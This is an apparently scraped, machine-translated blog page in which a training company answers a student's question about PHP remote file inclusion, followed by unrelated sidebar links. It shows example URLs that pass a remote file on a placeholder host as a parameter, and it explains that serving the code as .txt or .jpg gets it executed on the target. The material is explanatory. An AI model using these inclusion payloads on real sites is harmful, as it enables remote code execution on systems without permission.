当前位置:网站首页>File contains vulnerability issues
File contains vulnerability issues
2022-06-24 23:17:00 【Class hi Education】
A student asked a question before , The file contains whether the vulnerability can be loaded php file , Later, I answered this question on YuQue
When using File Inclusion Vulnerability to include remote files, such as :
http://localhost/index.php/?filename=http://xxx.com/phpinfo.php
phpinfo Whether the printed information is local information ?
answer : no
The contents contained in our remote file are as follows php Parse the rendered , If you directly pull the executed php That will get the result directly , So, oh, we pull them in other formats , Such as :
http://localhost/index.php/?filename=http://xxx.com/phpinfo.txt
http://localhost/index.php/?filename=http://xxx.com/phpinfo.jpg
And so on, so that the content can be parsed into php. Switch to jsp The same applies to type websites
边栏推荐
- Tech Talk 活动回顾|云原生 DevOps 的 Kubernetes 技巧
- QT to place the form in the lower right corner of the desktop
- Theoretical analysis of countermeasure training: adaptive step size fast countermeasure training
- Second IPO of Huafang group: grown up in Zanthoxylum bungeanum, trapped in Zanthoxylum bungeanum
- EPICS记录参考2--EPICS过程数据库概念
- Blogs personal blog project details (servlet implementation)
- Docker-mysql8-master-slave
- EPICS record Reference 3 - - field available for all Records
- The extra points and sharp tools are worthy of the trust | know that Chuangyu won the letter of thanks from the defense side of the attack and defense drill!
- 记录一下MySql update会锁定哪些范围的数据
猜你喜欢
伪原创智能改写api百度-收录良好
Blogs personal blog test point (manual test)
EMI的主要原因-工模电流
idea创建模块提示已存在
Non single file component
A big factory interview must ask: how to solve the problem of TCP reliable transmission? 8 pictures for you to learn in detail
【js】-【数组、栈、队列、链表基础】-笔记
![[laravel series 7.9] test](/img/49/4b470a8b309bab4a83eed930dcce65.png)
[laravel series 7.9] test
JD 618 conference tablet ranking list announced that the new dark horse brand staff will compete for the top three, learning from Huawei, the leader of domestic products
Tech Talk 活动回顾|云原生 DevOps 的 Kubernetes 技巧
随机推荐
去处电脑桌面小箭头
研究生宿舍大盘点!令人羡慕的研究生宿舍来了!
Second IPO of Huafang group: grown up in Zanthoxylum bungeanum, trapped in Zanthoxylum bungeanum
The large-scale market of graduate dormitory! Here comes the enviable graduate dormitory!
Servlet
【js】-【树】-学习笔记
力扣解法汇总515-在每个树行中找最大值
Financial management [3]
Record the range of data that MySQL update will lock
2022 safety officer-b certificate examination question bank and answers
372. 棋盘覆盖
MySQL kills 10 people. How many questions can you hold on to?
378. 骑士放置
Online group chat and dating platform test point
Construction equipment [6]
Financial management [1]
对抗训练理论分析:自适应步长快速对抗训练
EPICS record Reference 3 - - field available for all Records
Research and investment strategy report on China's bridge anticorrosive coating industry (2022 Edition)
07_SpingBoot 实现 RESTful 风格